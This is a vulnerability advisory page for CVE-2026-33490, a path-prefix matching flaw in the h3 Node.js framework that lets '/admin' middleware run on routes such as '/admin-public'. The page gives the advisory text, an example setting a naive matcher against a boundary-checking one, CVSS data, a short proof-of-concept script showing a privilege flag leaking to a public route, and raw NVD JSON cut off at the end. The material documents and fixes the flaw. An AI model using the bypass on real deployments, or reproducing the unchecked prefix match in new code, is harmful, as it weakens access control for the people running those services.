Security Vulnerability Report
CVE-2026-33490 CVSS 3.7 LOW

CVE-2026-33490

Published: 2026-03-26 18:16:30
Last Modified: 2026-03-31 21:00:14

Description

H3 is a minimal H(TTP) framework. In versions 2.0.0-0 through 2.0.1-rc.16, the `mount()` method in h3 uses a simple `startsWith()` check to determine whether incoming requests fall under a mounted sub-application's path prefix. Because this check does not verify a path segment boundary (i.e., that the next character after the base is `/` or end-of-string), middleware registered on a mount like `/admin` will also execute for unrelated routes such as `/admin-public`, `/administrator`, or `/adminstuff`. This allows an attacker to trigger context-setting middleware on paths it was never intended to cover, potentially polluting request context with unintended privilege flags. Version 2.0.2-rc.17 contains a patch.
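
The description above names the root cause precisely: a prefix test with no segment-boundary check. The following is an added example, not h3's own code, that puts the bare `startsWith()` form next to a boundary-aware form and runs both through a tiny stand-in mount dispatcher (the `dispatch`, `MOUNTS` and `SAMPLE_PATHS` names are constructed for this illustration) so the context-pollution effect on `/admin-public` and the other listed paths can be observed offline:

```javascript
// Added example (not h3's own code): a bare startsWith() prefix check beside
// one that enforces a path-segment boundary, plus a minimal mount dispatcher
// showing how the bare check lets a context-setting handler run for
// unrelated routes. All names and sample data below are constructed.

// Vulnerable form: any path that merely begins with the base matches.
function matchesMountNaive(base, path) {
  return path.startsWith(base);
}

// Hardened form: after the base only end-of-string, '/' or the start of a
// query string may follow, so '/admin' covers '/admin/users' and '/admin?x=1'
// but not '/admin-public', '/administrator' or '/adminstuff'.
function matchesMountSafe(base, path) {
  // Strip a trailing slash from the base (except for the root mount).
  const b = base.length > 1 && base.endsWith('/') ? base.slice(0, -1) : base;
  if (b === '' || b === '/') return true; // a root mount covers every path
  if (!path.startsWith(b)) return false;
  const next = path.charAt(b.length);
  return next === '' || next === '/' || next === '?';
}

// Stand-in for a framework's mount table: each mount has a base and a handler
// that mutates a per-request context, like the advisory's '/admin' middleware.
function dispatch(matches, mounts, path) {
  const context = {};
  for (const { base, handler } of mounts) {
    if (matches(base, path)) handler(context);
  }
  return context;
}

// Constructed sample mount and request paths mirroring the advisory's examples.
const MOUNTS = [
  { base: '/admin', handler: (ctx) => { ctx.isAdmin = true; } },
];
const SAMPLE_PATHS = [
  '/admin', '/admin/', '/admin/users', '/admin?tab=1',
  '/admin-public', '/administrator', '/adminstuff', '/public',
];

// For each path, report whether each matcher would set the admin flag.
function compareMatchers(paths = SAMPLE_PATHS) {
  return paths.map((path) => ({
    path,
    naiveAdmin: dispatch(matchesMountNaive, MOUNTS, path).isAdmin === true,
    safeAdmin: dispatch(matchesMountSafe, MOUNTS, path).isAdmin === true,
  }));
}

// Paths on which the two matchers disagree are exactly the prefix collisions.
function collisions(paths = SAMPLE_PATHS) {
  return compareMatchers(paths)
    .filter((r) => r.naiveAdmin !== r.safeAdmin)
    .map((r) => r.path);
}

console.table(compareMatchers());
console.log('prefix collisions:', collisions());
```

Run with `node`, the table shows `naiveAdmin` true for all four `/admin…` look-alikes while `safeAdmin` is true only for `/admin`, `/admin/`, `/admin/users` and `/admin?tab=1`; `collisions()` lists the three paths the advisory names. The same boundary test is what a reviewer should look for in any home-grown prefix router or reverse-proxy location rule.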

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

The score shown here is the Secondary (CNA) metric. The raw NVD record below also carries a Primary metric of 5.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N), differing only in attack complexity, and maps the weakness to CWE-706.

Configurations (Affected Products)

cpe:2.3:a:h3:h3:2.0.1:rc1:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:* - VULNERABLE
Affected version range: H3 2.0.0-0 through H3 2.0.1-rc.16 (fixed in 2.0.2-rc.17)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// PoC for CVE-2026-33490: H3 Path Prefix Matching Bypass
// Description: Demonstrates middleware intended for '/admin' triggering on '/admin-public'
const { createApp } = require('h3');

const app = createApp();

// Middleware intended strictly for '/admin' routes
app.use('/admin', (event) => {
  console.log('[!] Admin middleware triggered for path:', event.path);
  // Simulating setting a privilege flag
  event.context.isAdmin = true;
});

// A public route that should NOT have admin privileges
app.use('/admin-public', (event) => {
  if (event.context.isAdmin) {
    return { result: 'VULNERABLE', message: 'Admin context leaked to public route!' };
  }
  return { result: 'SAFE' };
});

// Exploit: Accessing /admin-public triggers the /admin middleware
// In a vulnerable version, this returns { result: 'VULNERABLE' }

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33490", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:30.237", "lastModified": "2026-03-31T21:00:13.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "H3 is a minimal H(TTP) framework. In versions 2.0.0-0 through 2.0.1-rc.16, the `mount()` method in h3 uses a simple `startsWith()` check to determine whether incoming requests fall under a mounted sub-application's path prefix. Because this check does not verify a path segment boundary (i.e., that the next character after the base is `/` or end-of-string), middleware registered on a mount like `/admin` will also execute for unrelated routes such as `/admin-public`, `/administrator`, or `/adminstuff`. This allows an attacker to trigger context-setting middleware on paths it was never intended to cover, potentially polluting request context with unintended privilege flags. Version 2.0.2-rc.17 contains a patch."}, {"lang": "es", "value": "H3 es un framework H(TTP) mínimo. En las versiones 2.0.0-0 hasta la 2.0.1-rc.16, el método 'mount()' en h3 usa una simple verificación 'startsWith()' para determinar si las solicitudes entrantes caen bajo el prefijo de ruta de una subaplicación montada. Debido a que esta verificación no verifica un límite de segmento de ruta (es decir, que el siguiente carácter después de la base es '/' o el final de la cadena), el middleware registrado en un montaje como '/admin' también se ejecutará para rutas no relacionadas como '/admin-public', '/administrator' o '/adminstuff'. Esto permite a un atacante activar middleware de configuración de contexto en rutas que nunca se pretendió cubrir, potencialmente contaminando el contexto de la solicitud con indicadores de privilegio no deseados. 
La versión 2.0.2-rc.17 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-706"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc1:*:*:*:node.js:*:*", "matchCriteriaId": "910077BC-C84C-4CAB-A0A5-761047F6F43C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*", "matchCriteriaId": "603A08FC-B20B-4693-90A1-0BF5F08B43AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*", "matchCriteriaId": "BCC5ECF0-0EED-48BC-95FA-1D2671A971A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*", "matchCriteriaId": "BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*", "matchCriteriaId": "3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*", 
"matchCriteriaId": "3D1C9D7B-3CE4-427B-93B4-EAF867159AFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc15:*:*:*:node.js:*:*", "matchCriteriaId": "5AE7D8A6-4506-418A-ABA4-C820A1DA7E7F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc16:*:*:*:node.js:*:*", "matchCriteriaId": "281715D9-6C86-4D4E-9833-C18A8CABD05A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*", "matchCriteriaId": "C5E7779A-00CA-45E7-8F68-1DAB5388ED4A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*", "matchCriteriaId": "064C21F5-8633-45F3-9A3D-3FB029A867B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*", "matchCriteriaId": "DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*", "matchCriteriaId": "496314A3-8F2B-4274-9D0D-7F11E896FEA5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*", "matchCriteriaId": "35F49342-D52C-4762-9369-F380C5E7E0B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*", "matchCriteriaId": "D11CA1A7-3141-46EA-9687-32C333FC7B0C"}, {"vulnerable": true, ... (truncated)